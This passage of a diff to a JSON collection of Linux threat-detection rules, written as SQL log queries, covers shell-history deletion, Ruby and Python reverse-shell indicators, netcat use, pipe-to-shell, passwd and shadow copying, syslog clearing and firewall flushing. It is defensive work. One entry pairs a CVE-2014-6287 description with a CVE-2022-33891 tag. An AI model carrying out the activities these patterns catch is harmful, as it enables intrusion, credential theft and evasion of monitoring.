the ~/bash_history to remove traces of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.impact", + "attack.t1565.001" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/update-ca-certificates' ESCAPE '\\' OR Image LIKE '%/update-ca-trust' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_install_root_certificate.yml" + "filename": "proc_creation_lnx_susp_history_delete.yml" }, { - "title": "Suspicious Git Clone - Linux", - "id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Setuid and Setgid", + "id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "author": "Ömer Günal", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.persistence", + "attack.t1548.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/git' ESCAPE '\\' AND CommandLine LIKE '% clone %' ESCAPE '\\' AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RCE%' ESCAPE '\\' OR CommandLine LIKE 
'%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%chown root%' ESCAPE '\\' AND (CommandLine LIKE '% chmod u+s%' ESCAPE '\\' OR CommandLine LIKE '% chmod g+s%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_git_clone.yml" + "filename": "proc_creation_lnx_setgid_setuid.yml" }, { - "title": "Remove Immutable File Attribute", - "id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", - "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Print History File Contents", + "id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.reconnaissance", + "attack.t1592.004" ], "falsepositives": [ - "Administrator interacting with immutable files (e.g. for instance backups)." 
+ "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/chattr' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_chattr_immutable_removal.yml" + "filename": "proc_creation_lnx_susp_history_recon.yml" }, { - "title": "Mount Execution With Hidepid Parameter", - "id": "ec52985a-d024-41e3-8ff6-14169039a0b3", - "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", + "title": "Touch Suspicious Service File", + "id": "31545105-3444-4584-bebf-c466353230d2", + "description": "Detects usage of the \"touch\" process in service file.", "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.credential_access", - "attack.t1564" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "Admin changing date of files." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/mount' ESCAPE '\\' AND CommandLine LIKE '%hidepid=2%' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/touch' ESCAPE '\\' AND CommandLine LIKE '% -t %' ESCAPE '\\' AND CommandLine LIKE '%.service' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_mount_hidepid.yml" + "filename": "proc_creation_lnx_touch_susp.yml" }, { - "title": "Linux Doas Tool Execution", - "id": "067d8238-7127-451c-a9ec-fa78045b618b", - "description": "Detects the doas tool execution in linux host platform. 
This utility tool allow standard users to perform tasks as root, the same way sudo does.", - "author": "Sittikorn S, Teoderick Contreras", + "title": "BPFtrace Unsafe Option Usage", + "id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "description": "Detects the usage of the unsafe bpftrace option", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the unsafe option" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/doas' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%bpftrace' ESCAPE '\\' AND CommandLine LIKE '%--unsafe%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_doas_execution.yml" + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml" }, { - "title": "Enable BPF Kprobes Tracing", - "id": "7692f583-bd30-4008-8615-75dab3f08a99", - "description": "Detects common command used to enable bpf kprobes tracing", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Linux Recon Indicators", + "id": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%echo 1 >%' ESCAPE '\\' AND CommandLine LIKE '%/sys/kernel/debug/tracing/events/kprobes/%' ESCAPE '\\' AND (CommandLine LIKE '%/myprobe/enable%' ESCAPE '\\' OR CommandLine LIKE '%/myretprobe/enable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '% -name .htpasswd%' ESCAPE '\\' OR CommandLine LIKE '% -perm 
-4000 %' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml" + "filename": "proc_creation_lnx_susp_recon_indicators.yml" }, { - "title": "Linux Webshell Indicators", - "id": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "description": "Detects suspicious sub processes of web server processes", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ruby Reverse Shell", + "id": "b8bdac18-c06e-4016-ac30-221553e74f59", + "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell", + "author": "@d4ns4n_", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Web applications that invoke Linux command line tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ParentImage LIKE '%/httpd' ESCAPE '\\' OR ParentImage LIKE '%/lighttpd' ESCAPE '\\' OR ParentImage LIKE '%/nginx' ESCAPE '\\' OR ParentImage LIKE '%/apache2' ESCAPE '\\' OR ParentImage LIKE '%/node' ESCAPE '\\' OR ParentImage LIKE '%/caddy' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%tomcat%' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%websphere%' ESCAPE '\\')) AND (Image LIKE '%/whoami' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/bin/uname' ESCAPE '\\' OR Image LIKE '%/bin/cat' ESCAPE '\\' OR Image LIKE '%/bin/crontab' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/pwd' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%ruby%' ESCAPE '\\' AND CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '%rsocket%' ESCAPE '\\' AND 
CommandLine LIKE '%TCPSocket%' ESCAPE '\\' AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_webshell_detection.yml" + "filename": "proc_creation_lnx_ruby_reverse_shell.yml" }, { - "title": "Terminate Linux Process Via Kill", - "id": "64c41342-6b27-523b-5d3f-c265f3efcdb3", - "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", - "author": "Tuan Le (NCSGroup)", + "title": "Linux Package Uninstall", + "id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", + "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", + "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1070" ], "falsepositives": [ - "Likely" + "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." 
], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/kill' ESCAPE '\\' OR Image LIKE '%/pkill' ESCAPE '\\' OR Image LIKE '%/killall' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%erase%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\')) OR ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND (CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%purge%' ESCAPE '\\')) OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--remove %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_kill_process.yml" + "filename": "proc_creation_lnx_remove_package.yml" }, { - "title": "Touch Suspicious Service File", - "id": "31545105-3444-4584-bebf-c466353230d2", - "description": "Detects usage of the \"touch\" process in service file.", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "System Information Discovery", + "id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "description": "Detects system information discovery commands", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Admin changing date of files." 
+ "Legitimate administration activities" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/touch' ESCAPE '\\' AND CommandLine LIKE '% -t %' ESCAPE '\\' AND CommandLine LIKE '%.service' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/uname' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/uptime' ESCAPE '\\' OR Image LIKE '%/lspci' ESCAPE '\\' OR Image LIKE '%/dmidecode' ESCAPE '\\' OR Image LIKE '%/lscpu' ESCAPE '\\' OR Image LIKE '%/lsmod' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_touch_susp.yml" + "filename": "proc_creation_lnx_system_info_discovery.yml" }, { - "title": "Cat Sudoers", - "id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", - "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "title": "Linux Shell Pipe to Shell", + "id": "880973f3-9708-491c-a77b-2a35a1921158", + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1592.004" + "attack.defense_evasion", + "attack.t1140" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate software that uses these patterns" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '% /etc/sudoers%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((CommandLine LIKE 'sh -c %' ESCAPE '\\' OR CommandLine LIKE 'bash -c %' ESCAPE '\\') AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR 
CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_cat_sudoers.yml" + "filename": "proc_creation_lnx_susp_pipe_shell.yml" }, { - "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand", - "id": "21541900-27a9-4454-9c4c-3f0a4240344a", - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Process Discovery", + "id": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
+ "Legitimate administration activities" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/bin/sh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/ps' ESCAPE '\\' OR Image LIKE '%/top' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + "filename": "proc_creation_lnx_process_discovery.yml" }, { - "title": "Atlassian Confluence CVE-2022-26134", - "id": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", + "title": "Suspicious Java Children Processes", + "id": "d292e0af-9a18-420c-9525-ec0ac3936892", + "description": "Detects java process spawning suspicious children", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.execution", - "attack.t1190", - "attack.t1059", - "cve.2022.26134" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '/opt/atlassian/confluence/%' ESCAPE '\\' AND ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR 
CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" + "filename": "proc_creation_lnx_susp_java_children.yml" }, { - "title": "Linux Remote System Discovery", - "id": "11063ec2-de63-4153-935e-b1a8b9e616f1", - "description": "Detects the enumeration of other remote systems.", - "author": "Alejandro Ortuno, oscd.community", + "title": "Terminate Linux Process Via Kill", + "id": "64c41342-6b27-523b-5d3f-c265f3efcdb3", + "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", + "author": "Tuan Le (NCSGroup)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activities" + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/arp' ESCAPE '\\' AND CommandLine LIKE '%-a%' ESCAPE '\\') OR (Image LIKE '%/ping' ESCAPE '\\' AND (CommandLine LIKE '% 10.%' ESCAPE '\\' OR CommandLine LIKE '% 192.168.%' ESCAPE '\\' OR CommandLine LIKE '% 172.16.%' ESCAPE '\\' OR CommandLine LIKE '% 172.17.%' ESCAPE '\\' OR CommandLine LIKE '% 172.18.%' ESCAPE '\\' OR CommandLine LIKE '% 172.19.%' ESCAPE '\\' OR CommandLine LIKE '% 172.20.%' ESCAPE '\\' OR CommandLine LIKE '% 172.21.%' ESCAPE '\\' OR CommandLine LIKE '% 172.22.%' ESCAPE '\\' OR CommandLine LIKE '% 172.23.%' ESCAPE '\\' OR CommandLine LIKE '% 172.24.%' ESCAPE '\\' OR CommandLine LIKE '% 172.25.%' ESCAPE '\\' OR CommandLine LIKE '% 172.26.%' ESCAPE '\\' OR CommandLine LIKE '% 172.27.%' ESCAPE '\\' OR CommandLine LIKE '% 172.28.%' ESCAPE '\\' OR CommandLine LIKE '% 172.29.%' ESCAPE '\\' OR CommandLine LIKE '% 172.30.%' ESCAPE '\\' OR CommandLine LIKE '% 172.31.%' ESCAPE '\\' OR CommandLine LIKE '% 127.%' 
ESCAPE '\\' OR CommandLine LIKE '% 169.254.%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/kill' ESCAPE '\\' OR Image LIKE '%/pkill' ESCAPE '\\' OR Image LIKE '%/killall' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_remote_system_discovery.yml" + "filename": "proc_creation_lnx_kill_process.yml" }, { - "title": "Commands to Clear or Remove the Syslog", - "id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", - "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", - "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Apache Spark Shell Command Injection - ProcessCreation", + "id": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.002" + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" ], "falsepositives": [ - "Log rotation." 
+ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%rm /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%mv /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% >/var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% > /var/log/syslog%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ParentImage LIKE '%\\\\bash' ESCAPE '\\' AND (CommandLine LIKE '%id -Gn `%' ESCAPE '\\' OR CommandLine LIKE '%id -Gn ''%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_clear_syslog.yml" + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" }, { - "title": "OMIGOD SCX RunAsProvider ExecuteScript", - "id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", - "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. 
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Disable Or Stop Services", + "id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of SCX RunAsProvider ExecuteScript." + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/etc/opt/microsoft/scx/conf/tmpdir/scx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' OR Image LIKE '%/systemctl' ESCAPE '\\' OR Image LIKE '%/chkconfig' ESCAPE '\\') AND (CommandLine LIKE '%stop%' ESCAPE '\\' OR CommandLine LIKE '%disable%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + "filename": "proc_creation_lnx_services_stop_and_disable.yml" }, { - "title": "Suspicious Package Installed - Linux", - "id": "700fb7e8-2981-401c-8430-be58e189e741", - "description": "Detects installation of suspicious packages using system installation utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Interactive Bash Suspicious Children", + "id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "author": "Florian Roth (Nextron Systems)", + 
"falsepositives": [ + "Legitimate software that uses these patterns" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (ParentCommandLine = 'bash -i' AND ((CommandLine LIKE '%-c import %' ESCAPE '\\' OR CommandLine LIKE '%base64%' ESCAPE '\\' OR CommandLine LIKE '%pty.spawn%' ESCAPE '\\') OR (Image LIKE '%whoami' ESCAPE '\\' OR Image LIKE '%iptables' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\' OR Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\')))" + ], + "filename": "proc_creation_lnx_susp_interactive_bash.yml" + }, + { + "title": "Python Spawning Pretty TTY", + "id": "c4042d54-110d-45dd-a0e1-05c47822c937", + "description": "Detects python spawning a pretty tty which could be indicative of potential reverse shell activity", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%install%' ESCAPE '\\') OR (Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%localinstall%' ESCAPE '\\' OR CommandLine LIKE '%install%' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--install%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\'))) AND (CommandLine LIKE '%nmap%' ESCAPE '\\' OR CommandLine LIKE '% nc%' ESCAPE '\\' OR CommandLine LIKE '%netcat%' ESCAPE '\\' OR CommandLine LIKE '%wireshark%' ESCAPE '\\' OR CommandLine LIKE '%tshark%' ESCAPE '\\' OR CommandLine LIKE '%openconnect%' ESCAPE '\\' OR CommandLine LIKE '%proxychains%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine 
LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_install_suspicioua_packages.yml" + "filename": "proc_creation_lnx_python_pty_spawn.yml" }, { - "title": "Copy Passwd Or Shadow From TMP Path", - "id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", - "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", + "title": "Flush Iptables Ufw Chain", + "id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", + "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Network administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/cp' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\' AND (CommandLine LIKE '%passwd%' ESCAPE '\\' OR CommandLine LIKE '%shadow%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/xtables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/iptables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/ip6tables' ESCAPE '\\' OR Image LIKE '%/ip6tables-legacy-multi' ESCAPE '\\') AND (CommandLine LIKE '%-F%' ESCAPE '\\' OR CommandLine LIKE '%-Z%' ESCAPE '\\' OR CommandLine LIKE '%-X%' ESCAPE '\\') AND (CommandLine LIKE '%ufw-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw-logging-allow%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-allow%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" + "filename": "proc_creation_lnx_iptables_flush_ufw.yml" }, { - "title": "File and Directory Discovery - Linux", - "id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", - "description": "Detects usage of system utilities to discover files and directories", 
